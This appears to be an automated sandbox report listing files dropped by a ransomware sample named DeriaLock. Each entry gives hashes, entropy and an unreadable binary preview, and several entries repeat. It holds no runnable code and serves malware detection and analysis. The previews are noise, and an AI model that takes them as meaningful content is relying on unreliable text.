                                                                                                                                                Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@."a.d...M^.'.5.n_.*......0....$;.^. ..1..g._h...T.'...2..."..FA.B >*.....G......<m|.Zx.q.ya...D...J...J$......uD.....9.....kq.).....#...v4.8.I.w.........n.^....v..Je........).u.kz.0.q.....>...K.7.}n.i..SKt....E....;9.Hir..N.,o.qZ.u..E.?l
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.824368872704883
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MEKNel2gkiRxCfdE+A8pRw86SEd+aEI2IaD7ez8lKyBF:MEK6DxkdrK/B+aE5B5lKyD
                                                                                                                                                MD5:7E5B9F111D1E4A1F25FC53B9F8BE1BBC
                                                                                                                                                SHA1:BEB047B13A85CE37981B03EF2FC909C23AA8E3B6
                                                                                                                                                SHA-256:D475555C6803EE84BCCBF03F8C101FFD167630FA100AB9860FC14A7BB430EB71
                                                                                                                                                SHA-512:57E03894E76AB23E78CEE2F385ACAB69F9E5C0398FF53CDB0DFF69DE9B4FCA71320EE550B25FD3278565ADF05979CF98928DEEA95C2A36F8FC0B6AE546A6E9F7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.]g.\...Y.5*bm"=.Ly.=+..)......1.q....../.5...ij.ix..qH........~.+b..2..,... [...:u...Ji.g..U?..BV..e.*....q.{W..\u....>.=M...WO..I+...(......eK..:[...+<V..L.<Y..Z/ie-....:.V.`...^a|J.:k......~.ci.m.r\*.%..+./..J`0.]T\.4...T-. ...>[.pLb....d.\..$.a....Pz....&..K.=..X..*...A...b..@.".R._V7..;..m.k.E.a.6~..F........UK........|. ......G...".+c.W%F....<tD/;...GJ/...H.. '...}.=%8a..f..I.Sc..qk.~.O8.[.E....]...".$..Y:.o.k.v...0...W...*` ...T...".$w....o8.!U.n!..I.....}......>N....j&..l...l`...%..[.B.{..B.J..4q.~.....i<.]L.lU..\..A.%..=.[...*#?.<..t.>\..>.G;...:K8(...}{..,.....rP.X....E....a..x...Q.G..5....0.i.=...iQdY.-.......(..a....@.....c....]y.x5.kJ....M...P..n^.,.i7.....#8..n.)<.....X......UE.D..7e>.....{.!.R../......D.........+.n6m.K1O$A4.M..:.u..%V...#.t...u%B..}.?.A..V4s..E.^"'....#.....Lp..#...w..C.CgQ..!..9..b>...fJ'..!0.....60J..k....+V..p0.<4.....3..I..L.....J...1...j...h....D.s|....O.m.Eu&......-X}cPi6.....C2$..D..B.....drh.Q....q,....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.796075793910062
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Xmk7T6amrld7OMB4DtDpWx31Km2b/6brqSof7HX42rCO8VJJvl+Y:Xr+amrld4BVaL6ydO7HX4pl+Y
                                                                                                                                                MD5:C4F595B789B1F7524DB7CEB3C2DAEAAC
                                                                                                                                                SHA1:B3A5596A8BE59DD1136C74F495BEDEBB75E4B897
                                                                                                                                                SHA-256:E535053A05303EB39BDA8EF572A1BE0516E5DC37D70CCFC47B27351C792891FB
                                                                                                                                                SHA-512:77A070BA8226C03AE0924AF6B7E255285372F54C08B95C14B051BAF673CE7F6BA1FAC5B5D78608142A3A8F60B3D2919E9CF10F531954F5B285752575A539D1C6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..H.>.....M.SA...... ``6.L.q|?.E....h.(..3..:..4pl...?^..s4.7..,.(.....S.....H4.." ../......*.....$..|.....$.e.....cU.......YB...`.........r..)F.'j..t...wrz:x..o....Q....++..@&..E.."....Q.PV..".l]...5...tu,..L..xev.n.Y..P..Kw..|s&....FqI....TaL_M..U..@.G$.w...I%.e|zp,'.|....W..E..P..F0."=.4o X.7Sj!._>..&>......HY....w..:...e....@...~..*.{....>f|.$..!..h...:.$..A6W..<.....aBP..6.f..>...Y...Y...<......B.B.h{y......u..C....[.O..qf..w.......@K`.......U..2a.?2.D.ir...j.N..u9'T......g.1..+..........Ve.e...O'd..h..(..."s.4..wX.&...\r1s..t...f.y.a:Frz.s.?w.;.>&.O..$Bn...;.=rC...X.......".i{....[^...`*...3..a..N..\.....c.I..jl8...{..j..;.i%vO,^.(.#...LxY..k..Q.....C..:K.|.c.....'.,.<...`...R.. ..%..7g]..S....3OjH^A.....r\T.&..y..{.....1C.)|uk.(s...i...)n......6.Ta..N[...g..P.....'.&O.oxJ.[a.T.Ld...>...>.........0..N.0y`.:.P4/F...R.....z.\.B.B=.%.'7..Mp].1.=..........{...h},19...++.Y..KH.tN........./...?>.....j#.!.ImM.#]...O.B.#*..r......+.J..U.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.796075793910062
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Xmk7T6amrld7OMB4DtDpWx31Km2b/6brqSof7HX42rCO8VJJvl+Y:Xr+amrld4BVaL6ydO7HX4pl+Y
                                                                                                                                                MD5:C4F595B789B1F7524DB7CEB3C2DAEAAC
                                                                                                                                                SHA1:B3A5596A8BE59DD1136C74F495BEDEBB75E4B897
                                                                                                                                                SHA-256:E535053A05303EB39BDA8EF572A1BE0516E5DC37D70CCFC47B27351C792891FB
                                                                                                                                                SHA-512:77A070BA8226C03AE0924AF6B7E255285372F54C08B95C14B051BAF673CE7F6BA1FAC5B5D78608142A3A8F60B3D2919E9CF10F531954F5B285752575A539D1C6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..H.>.....M.SA...... ``6.L.q|?.E....h.(..3..:..4pl...?^..s4.7..,.(.....S.....H4.." ../......*.....$..|.....$.e.....cU.......YB...`.........r..)F.'j..t...wrz:x..o....Q....++..@&..E.."....Q.PV..".l]...5...tu,..L..xev.n.Y..P..Kw..|s&....FqI....TaL_M..U..@.G$.w...I%.e|zp,'.|....W..E..P..F0."=.4o X.7Sj!._>..&>......HY....w..:...e....@...~..*.{....>f|.$..!..h...:.$..A6W..<.....aBP..6.f..>...Y...Y...<......B.B.h{y......u..C....[.O..qf..w.......@K`.......U..2a.?2.D.ir...j.N..u9'T......g.1..+..........Ve.e...O'd..h..(..."s.4..wX.&...\r1s..t...f.y.a:Frz.s.?w.;.>&.O..$Bn...;.=rC...X.......".i{....[^...`*...3..a..N..\.....c.I..jl8...{..j..;.i%vO,^.(.#...LxY..k..Q.....C..:K.|.c.....'.,.<...`...R.. ..%..7g]..S....3OjH^A.....r\T.&..y..{.....1C.)|uk.(s...i...)n......6.Ta..N[...g..P.....'.&O.oxJ.[a.T.Ld...>...>.........0..N.0y`.:.P4/F...R.....z.\.B.B=.%.'7..Mp].1.=..........{...h},19...++.Y..KH.tN........./...?>.....j#.!.ImM.#]...O.B.#*..r......+.J..U.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1414608
                                                                                                                                                Entropy (8bit):7.999865142109503
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:4uHyjr8rVtSnYJKtA/uG/UJKdOuIOFzJW95vZ8gDrphjZ3ylUcr0NfC:Xyjr8PdJK2fdOFAzJGyq7Z3uU008
                                                                                                                                                MD5:0CB084797BEC1547CFAC0704E60A7A66
                                                                                                                                                SHA1:195A65C07BF938BCEEAF6C40C5A240DE1661D3B4
                                                                                                                                                SHA-256:17B9371A7EC9B144A3E4BD061D4B1C9C5EA1ADE7158619CF2FD8F4CA357E0906
                                                                                                                                                SHA-512:30B502488868ED1E622CF7E5CF177DF184AEEE5D89EAE414EC36AB3DD4AEA5CA639498CCD56646ECE4A329984232950288E6EB792EF9C067E99ABBC02211BBAB
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..sU.^."..u..).8.....>bv...2^%.'.$....G.].rM5..V..@<.).<.?.W...6T..&f..4.......q.Y.V..]/./....}......W.}....Y3.....'..]....1....".."...4.. ^F.VFB.....T..h.....G.&...zZC.y.....w........GFjf..E....\..y.R..A.q69.......PS....F1..E./.Q..._Ju.. ...?.N.]Iy...t.0.%.RB}>....?...x.0...6|..P&.u..k.....rg.......O@...."..2..._A.O........0M...s...qN..KM.k.s....S.......K.....m...}...i.je...o.W.J0.....R+W...J.E..23w,.....>{t.....<<...&..W{*....#..E.P/.....\/..A.....o}j.#-Q.q-./*.A;.-B..;..k.......L.....xv#....81*.-.).fF..e..X..C.y..&a,\}.....y..V)......{M..y.F...m#.....I.....VuA.c..a..h......f......Ec..G......!......K..:Ws.......I6..`.GS...j...n.!...._...].ag.CH:.6...T.......W#s.I2.t..j...M..b....T...O...L........,...m{s.]!.....Q.........D....{.....Q.~..i.VX.......I^.;\J.....{=^o..'M.#..!9@[G.y.V....^r,.Y[...?S..=.cb..m"B<....=.Q.L.)...?..>p9.!..=.....T..{Dy._.=.7n.T.8...b.3.... z..Y....U..*..R.2..%..W.x..<%.b;...A6.........+....F........1.AsW..s
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.8207971381237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:XlryTiJ783eJxpYF/sXsfib3bsQzZWDcaEtZssKm06H:XlrUbOXcNfMPzZ1sLG
                                                                                                                                                MD5:D2C0090ADDD7125E2B4D16F1C7E0D69A
                                                                                                                                                SHA1:FEF7004AAC003FC0D6F2B675820897F09C8207AA
                                                                                                                                                SHA-256:05BD26604B8BCB6B3467D6B2E84B5B75EE58AD48C672516B53347CCA7DF62B9B
                                                                                                                                                SHA-512:7F3D0F4A4891EBF5923BC7D89B3C5BCF454D51A99F0767F099A36458D0D6C40DB4FE43E534045DE842C02C03ADFFBB652B6321502C3D6770EA87744E264C82E3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:*...W..eT....:..$..s..UQ.v.U6..|SVb.O.R.o.^....6..........V.~`.I........s}G.Y...-CA..S..[.....%....{.}.*.J.,y}.zj....":...R.-. ....M^.[1...nzK.*.......A....3.....f./^?{...m.T....<.........5.b.2F..L`.....B9.R.346......9.E,.*F..w.%.....9.`.S.G...s.. ..o...|uV.].E.-.PTKH...Wxb9..^#.]O..I...".Q2.8.t.9&...../;`p..w.]B.J.v...B..9d.d..$...O....f.h!.G6.........q..|'.Z`].......K09..V....^@.....T....R..^.TG.?...-.....C..I.y._s8.uH..-.5n....[..T...c'..4y.L.B...T...+...e8..j.^.-...OW@.!.r..((.>...r.q..4..a..Y...Ev=~.XP..k..o_./..."..M..i .....V...u....@...j..(.......l.i.[.q.o...;....&D.U._..d[.t..O.J.....<.hr. {.=...~H._.y...M....u...}...G.P.UC..>..L-/........t9.H.....{F...n.....K.^%./+."...KF.J~.ZO/..F...k..(.......&u.^.jC.3.....S'].Aq.*\.........4.K..U.S..b...........<pI%F! ...a.<s.y.J...N.L...._...{...D.c.........}..hF.......m...'j.J..w..d........A.#.|4.i....S^.k......}.3.o....c{....nwm.K.-^U....|..W../....C..........tZ;.vt....g#.....`....\
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.8207971381237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:XlryTiJ783eJxpYF/sXsfib3bsQzZWDcaEtZssKm06H:XlrUbOXcNfMPzZ1sLG
                                                                                                                                                MD5:D2C0090ADDD7125E2B4D16F1C7E0D69A
                                                                                                                                                SHA1:FEF7004AAC003FC0D6F2B675820897F09C8207AA
                                                                                                                                                SHA-256:05BD26604B8BCB6B3467D6B2E84B5B75EE58AD48C672516B53347CCA7DF62B9B
                                                                                                                                                SHA-512:7F3D0F4A4891EBF5923BC7D89B3C5BCF454D51A99F0767F099A36458D0D6C40DB4FE43E534045DE842C02C03ADFFBB652B6321502C3D6770EA87744E264C82E3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:*...W..eT....:..$..s..UQ.v.U6..|SVb.O.R.o.^....6..........V.~`.I........s}G.Y...-CA..S..[.....%....{.}.*.J.,y}.zj....":...R.-. ....M^.[1...nzK.*.......A....3.....f./^?{...m.T....<.........5.b.2F..L`.....B9.R.346......9.E,.*F..w.%.....9.`.S.G...s.. ..o...|uV.].E.-.PTKH...Wxb9..^#.]O..I...".Q2.8.t.9&...../;`p..w.]B.J.v...B..9d.d..$...O....f.h!.G6.........q..|'.Z`].......K09..V....^@.....T....R..^.TG.?...-.....C..I.y._s8.uH..-.5n....[..T...c'..4y.L.B...T...+...e8..j.^.-...OW@.!.r..((.>...r.q..4..a..Y...Ev=~.XP..k..o_./..."..M..i .....V...u....@...j..(.......l.i.[.q.o...;....&D.U._..d[.t..O.J.....<.hr. {.=...~H._.y...M....u...}...G.P.UC..>..L-/........t9.H.....{F...n.....K.^%./+."...KF.J~.ZO/..F...k..(.......&u.^.jC.3.....S'].Aq.*\.........4.K..U.S..b...........<pI%F! ...a.<s.y.J...N.L...._...{...D.c.........}..hF.......m...'j.J..w..d........A.#.|4.i....S^.k......}.3.o....c{....nwm.K.-^U....|..W../....C..........tZ;.vt....g#.....`....\
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.821821777395143
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:4y9PanvOBObTTGEcJR2YJONF0UoCjCjCx+qJ:j8nvOsfUxJ2pjCjCx+qJ
                                                                                                                                                MD5:212F169D9C49387EF0C1840D61C826EF
                                                                                                                                                SHA1:8611D2026311658CAFC94A9041690320E08DD6F8
                                                                                                                                                SHA-256:44CFC21C03076127622E5FB6ADC33C797172049E195EB6D69DA9F98C097979B4
                                                                                                                                                SHA-512:91AA8B741DC7D98D9439EA478AE177BC1F49BE650BACDEE1CE6F7E14AFC4AA556A783CB3D76354FB137BB5A6DC5E58B169DD9362BC2C0CC6F6B81320F2842949
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.S....)...r.*.#..I#....I^W...G...g.nX.....`.}k..I.[..4.C\...B.....jA...^..U.h..5...5......I......].....>......y/.?.\....Ik............=...]!.N,..<\i/.1...Be.Jb".......V.Ik.V.{..v. ..>Gl.Ydc..2...v.3...E....>.D..n..)..4.K...I.U.>M.m.{9.>...p..(........|z..1..6@...r......D...L.&.F/s..d........K.....q!..q.}.<.b..^.....r%q..=..k.#..z.E.NUI_...0....,..N....s. >..9.2J. 'a.om..>/.E..Y....t..PCf.o..>........,.....^..d.5......E.lWLZ.........[.a.....Y.w...y....l...?....|....K..o..R>[...Q(T...Q.A....hq5....e...0..]}.=..l#.v9..u:.|.s.. s..G.z?...L.... .Ud....)-.[...+...b.=P..7.}c...q.C..w...].r+....S..O.).?.&...|e-.....x...Q#8.......r...z/....JR:.).'.j......u.%b3..`.?..X..d%Vs.:. .e.d.VJ.r.7F_..Q..v....{1...z.=L*.....\.h;.q@..+p.m..IM.^...GJb.......I.S.Z5...3ON......"..`.....w....0W...Vl..F..j..H..wW.C.Y.KPZ.&.+ru..w..EG4....yZ.d.}'M....|...h../I................:/..}.w.i5...@.8..'O...CP9..@.)$z:........XW......c..F...U..N.Nd1....P7.i.....(J..`....T.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.775161817333955
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:7n4A+9v0pbrpVlLbW1FIAnV8Qdeb2UlcBLU6OnctCgubGQtk:7nXqvCfdLbWPIAnddenlDjnRa
                                                                                                                                                MD5:258630CACCCFDE63FFF80D277346D031
                                                                                                                                                SHA1:86A89D841872C5573C7E235E6074B30760F8F08C
                                                                                                                                                SHA-256:ABBA326F7887E4E2ABFB796183A829235729C3DF0C1430CE48670921AE9B04B1
                                                                                                                                                SHA-512:364CFA3D258795E699EA8ADB9C3AE5AECE6C3F82BAD7DF2F310362F6355C028A04A6645CC5CA8723F055DD7C6976060F2F8C56170F2FDDCD7ED85C8663354CFC
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..2..G..Z...(^@3.d...S.=..3m2.nt.d>.s#....4..[.......YCSc.:..x.?.<_...0Ta[4..LQ..~:..l...c.'~..g.~...ej..$.I|........h.,..n.6..ox........VknOb..jN.u.9....I}-.....}......5......*..`....T..1x.R..Ns.W... .d..R.o..h..Z.,......h.....8) ..o..ozuh.....-..H..pU..S.~..pn.AP.U.6.........i.A..T..f..?..~.U.QM..qv........h.j...|...5.......'2.....2&?'+.q.DyWe. {..D:..@....[A9...-m..n...%L...=.:...M.C.a..Z.FO...~...U.....K.......hQ."..j.T.i.<S.....N..=6..1..r...e.Ao.A...Wc$...:..,...8].....R_WP..8p6.a\..]rg[.(.......Q.....O.Q.tZ.x<.}.9.j8.u..F......s.E...zTY..A...y..t...~..Z...:;.W...B,.....?@&fy.(2........W......8..wLOQ+.........+QV.=a.x......g.;c..[..W..h....s..v_I.]1..g.W!.:...|P......-){...Y...f.[.nVA.i..?...4...........<}..w.uV./.M...(._.j..|./...c<.2*.M...a.g.kI)w...vg...,.? ...,.7)P..^R;+.r.....oYvp.#...90.]..I..?G.u..,.........j..N*.UA..V....?..$.NQ..T.D..3MT.:.....E......g.X..v......uRB5G...l..3...Q....6A)....7O(?....K.H..N..zT.....h|......
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.814102682444628
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:poqH17O3hKW+et0OlsOasAylBOVopZX015EM6ZXppz0thN7VyVbh9zf/Yqd+qLWs:GCsCxL1s5PXu5hKoFEbh9zXzXKqbY4MW
                                                                                                                                                MD5:AC33DE231F13F7B3AD064DF133F807F5
                                                                                                                                                SHA1:DFD0FE62ED33D8B6E175B079A80301E2D8DFF3B6
                                                                                                                                                SHA-256:1FCA0860B84B8A00D05A9C29395A179B71F38DED162A4889EFF842F052EDDA8B
                                                                                                                                                SHA-512:59F9B08D7A2DA270F07013B5CF2711E616EA71F605F80964B929A5614D3B3543FEB8DF28502C6209D9EDDE1A5CC817D20FCE67F4F0FD86F0EB5F58948CFB5627
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.W....[Np.7..m.r.....M.k..2a9.4...[......&K...9.."..s.zSi..Y.T..>,/...a._=,T....1...]..r..T...6..Mc4...L... H.'.....s!....IG...v....N.]@o..n../V....d.O..... I..).[.''.&.~..g..A./.q...X.:Z...xQn|t...y..3.P;k...x.....?NM.7\.&~.uW.'C.........'....<..T._..."v...$,.;.X..=....F.....qS.5.qj...F....~..)~.a...E.rD..rC....*V.......Z.....+.J.*r..._..E.U.Y.]].Q.oo6.%o.....K.t...S....l,....Td..IJ.o.....(...O.X.+g_.......*.0.4........Z....N...5...+...f"}.'{.k..k@57.3...._.X.6..=.......=s~...[..a O].......$...6T.M..`.Rz..4&.....!*.I...*u..8/....)u..E.\..C.e......... Q~<.oC...}..a|...K.......j..6.Ss.g.C.2.8..P..._Q...>.....^.n|..../..<...p.e...J."........ L.&Lg`9.cxN._1.[.9S..+.g.A*.C.R..@...[u..fupB3......>&.:..i;..JX`N>........t ...L.[..E'.D(.....Ik\.~.dn..#......&+.l.E.}B..............&.......Y.B.V.....#..:..v...I...u.rVH..D.L.a...8.....~.*....I2.eY....`..o<;{*-;..PX..pN*..,&H...V.(S..3..N.....LD..T..V.k?.<.S..li...r/....}.....w$'.Y..6G:Te/...f@iQ....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.759663142464938
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:O3ARrQZeMdAFTNH2cHBZ3/XeI/mfKIDTCAWaN55yqi:OQRIeMwN1h1UlDTCXaN55i
                                                                                                                                                MD5:5C8AF6C06F0D39DC7D0B58229552CB12
                                                                                                                                                SHA1:69541BBAF023517C6FCABBD1A688016D24226914
                                                                                                                                                SHA-256:F4CA3A4185C1E10C1F57275BB57B36FDB7851CC793085CE3CC6E594993A3CC1B
                                                                                                                                                SHA-512:AC4283A725305A4A1EF19154FE3758AEF749249DEA71C948635F49722C95AF51E25E6E7B438E4AD26474722364B32F9F91100555FB1324F14CF5C115B2FD0D38
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.^...=..%.d.a_..J..R=f.z.@~..^........SC...@*......B.k,%.TEw"...1.rH..r...-uP..*.4....a..8.7mNV....?&.u|0.t.....CeD..l..R...KFfF.rHw...V0.........t..v..t...SBd.!..1y.....1...IU.I..Q.L*q_...H.&p....*7.O.cQ..V.?`....s_J*.........W.16(......=/[r"Y...G_.q.m.\wI.Xw......".o.{.|.?...`#.a.:2. .{.c..V...}M.g8i)..2)..H.......%C...h...E........i`Hof}...sK./a......}..*..h.x...k.......x5.........&./.6...>.>.L.D.j.$. 6.>b.8M..)...~W2...E..Kw.....r.|............9>.}.(.i=9..U...J....".k.\~... 7.....e~6e.....jR..:1(..4....r./n....!.U..)Hr.....vS...]...P..............G.._..6lr..*..#q..]r.B.F.*...U.....ok{.}d.l4.)..I..x&.....yYR....P.....f.1d...F..H.y.#.>.....~...k....xK.{.6v.?g.)..V.1..=...^@4.2.y=aM.4=0...Yivu....*c..(%...f4vI.. >^I..H..!k.P...f8.C.........h9...q.>....)....X...t.`...>.I..OL...U.....3#s.8.%.CS.M..M..m....zL.D..._..Q.p.q..}.rU1....I<`.M>..G...H.d........2.....D.a...8.3........c..!.b..[%E....0.|QDmH...."..I....4.9....m49...x.j...n.......{z
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.824117775615902
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:eFLAUWIzVnFljb1iLHZcjwEU81MhI9+6wn:eFLA2zFjZUCwes6wn
                                                                                                                                                MD5:2EC787EEF9F9EFDBD340A9CB0D3D4D36
                                                                                                                                                SHA1:CB7C1135BFCDC7BF6E1BE69DB342B34665B352D3
                                                                                                                                                SHA-256:EBB9457201990693DC1DEF1C4F1F7462EBB12B3FCDD7C5B67F46E96B5F78C169
                                                                                                                                                SHA-512:481499A356BF304597DE36E87D7AA1797B676FCA506632D41375142A960569C781D00B0679A91DA37E037AADCBC6B79A820B59D0739E537E0D402B947C63CBAF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:+4.x......`....<..t.uAn...JmUM.Ik(?i.a}-.i<.a.....{..A...=..M..r/..;...Q.i....e[.?l..{....:.e..........+..Z.}Z..S.n..~...dj!.T...}..N+..`81..J..D).a.C...L.z..I.....Y..X..-....E.....uY.......q..Gs........Me2M.e..>.b....|*..(...Gt...y.O....TW]wy/f+..6.bF..........g`.?K...8;L.u.il..r.).J3.O.-<....ku...D=~.W..w..;...AOs.d8.<.k........._..Yrq..>BG..ux..6..A.....3]k.J~..5.U.q.A.\0^;X\k..m.b2=.@P.........+Mqj....'j.Mc&...r..7o../.u.f.DC.vo../r...qw..c..&..2..B..e..6.B.:..`....E.3.*.<...rX.......Ef..B...r..Q4\..H....(..N...[+....=...Xa.O..3.....CV.;...1..q(=y^...............v....j.5AG.#k,......%.m......N..NV?%..[+Z+....:\...zK.k...O......."O8].e...(zd....#........\Ebe.......t..n.K.>.."{8f.......4...F...1$...R ^........+.V*&...Qpo.b.2.gy.7'.oY.hu.......D.Kf....j..i^=../$I2.?...Gb....f...&k`X........F....... /.....4./.........].........j.Q..=.}o..[.O...z%IE.......N...E@... C..(..(6.4.....-L...?%,.gH}..3).K.U..&.Dy;..h.........phhR..O9.S2?Q
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.824117775615902
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:eFLAUWIzVnFljb1iLHZcjwEU81MhI9+6wn:eFLA2zFjZUCwes6wn
                                                                                                                                                MD5:2EC787EEF9F9EFDBD340A9CB0D3D4D36
                                                                                                                                                SHA1:CB7C1135BFCDC7BF6E1BE69DB342B34665B352D3
                                                                                                                                                SHA-256:EBB9457201990693DC1DEF1C4F1F7462EBB12B3FCDD7C5B67F46E96B5F78C169
                                                                                                                                                SHA-512:481499A356BF304597DE36E87D7AA1797B676FCA506632D41375142A960569C781D00B0679A91DA37E037AADCBC6B79A820B59D0739E537E0D402B947C63CBAF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:+4.x......`....<..t.uAn...JmUM.Ik(?i.a}-.i<.a.....{..A...=..M..r/..;...Q.i....e[.?l..{....:.e..........+..Z.}Z..S.n..~...dj!.T...}..N+..`81..J..D).a.C...L.z..I.....Y..X..-....E.....uY.......q..Gs........Me2M.e..>.b....|*..(...Gt...y.O....TW]wy/f+..6.bF..........g`.?K...8;L.u.il..r.).J3.O.-<....ku...D=~.W..w..;...AOs.d8.<.k........._..Yrq..>BG..ux..6..A.....3]k.J~..5.U.q.A.\0^;X\k..m.b2=.@P.........+Mqj....'j.Mc&...r..7o../.u.f.DC.vo../r...qw..c..&..2..B..e..6.B.:..`....E.3.*.<...rX.......Ef..B...r..Q4\..H....(..N...[+....=...Xa.O..3.....CV.;...1..q(=y^...............v....j.5AG.#k,......%.m......N..NV?%..[+Z+....:\...zK.k...O......."O8].e...(zd....#........\Ebe.......t..n.K.>.."{8f.......4...F...1$...R ^........+.V*&...Qpo.b.2.gy.7'.oY.hu.......D.Kf....j..i^=../$I2.?...Gb....f...&k`X........F....... /.....4./.........].........j.Q..=.}o..[.O...z%IE.......N...E@... C..(..(6.4.....-L...?%,.gH}..3).K.U..&.Dy;..h.........phhR..O9.S2?Q
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.780049732096254
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:dSRxY99DapdENpF0m4qUyv1zavUmaQLhbh4DUDO:GxY7DapdsH4xyvxd9EhbMUDO
                                                                                                                                                MD5:0D72E9C5394B438F959CB19649EF7C31
                                                                                                                                                SHA1:A5FED6D805F250A2758EDC8975EB6631E1E359E9
                                                                                                                                                SHA-256:0CD930F919B56058AA93D969546869C02D266377E627A6885F5557FC692AE0A8
                                                                                                                                                SHA-512:CA14020CF1FD91772DF88A4EA158451A04657380F475DCF317F0683CE684173AB2335E4C47D9C34DFE3FF6BDABFDF54504181565E15A9042A6DEBCED27D34B07
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
